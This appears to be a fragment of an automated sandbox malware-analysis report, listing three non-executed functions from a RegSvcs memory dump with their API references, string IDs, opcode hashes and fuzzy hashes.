                                                                                            Uniqueness Score: -1.00%

                                                                                            Non-executed Functions

                                                                                            Function 014FB5EC Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 238COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-$0$0
                                                                                            • API String ID: 1302938615-699404926
                                                                                            • Opcode ID: 52221e0653bf8bb605d56922a728becdbebc4a5dadebf833470fb240004c8702
                                                                                            • Instruction ID: fefcd66e304a1b4c5ba07b7cfc612c00415cfdd2527ea9bcc3fc1974a3f87018
                                                                                            • Opcode Fuzzy Hash: 52221e0653bf8bb605d56922a728becdbebc4a5dadebf833470fb240004c8702
                                                                                            • Instruction Fuzzy Hash: BE81AF70E052499EEF258E6CC8917FFBBB2EF86360F18411FDA55A73B1C63498418B52
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F096E Relevance: 6.4, APIs: 4, Instructions: 385COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                              • Part of subcall function 014F2DF0: LdrInitializeThunk.NTDLL(014EA618,00000037,?,00000408,00000000,?,00000000,Threadpool!), ref: 014F2DFA
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BA3
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0BB6
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D60
                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 014F0D74
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
                                                                                            • String ID:
                                                                                            • API String ID: 1404860816-0
                                                                                            • Opcode ID: 4ba3125a0d1da22ab7f46797cfb87582c56a4675b712e6df81c02f51b9a9c42a
                                                                                            • Instruction ID: 526e53c1229381192c47ae03020dddabe2f9298570616a01fbc314b7454f55c9
                                                                                            • Opcode Fuzzy Hash: 4ba3125a0d1da22ab7f46797cfb87582c56a4675b712e6df81c02f51b9a9c42a
                                                                                            • Instruction Fuzzy Hash: 84F17A76A007159FDB20CF68C880BAAB7F5FF54314F1445AEEA89AB351E770A944CF50
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            Function 014F7D61 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 284COMMON
                                                                                            Download Yara Rule
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000E.00000002.1772711295.0000000001480000.00000040.00001000.00020000.00000000.sdmp, Offset: 01480000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_14_2_1480000_RegSvcs.jbxd
                                                                                            Similarity
                                                                                            • API ID: __aulldvrm
                                                                                            • String ID: +$-
                                                                                            • API String ID: 1302938615-2137968064
                                                                                            • Opcode ID: 9bb2327a3b238e02b00032b8e49fe6c0648036f27ae53b27d8173307ab47651f
                                                                                            • Instruction ID: 5afee909056e5b504eead4e51bd933a585419e806968eb9dc7166c049ac7cd74
                                                                                            • Opcode Fuzzy Hash: 9bb2327a3b238e02b00032b8e49fe6c0648036f27ae53b27d8173307ab47651f
                                                                                            • Instruction Fuzzy Hash: B3919371E002069AEB24DF6DC890ABFBBA5EF44322F54451FEB55A73E0D73899418721
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%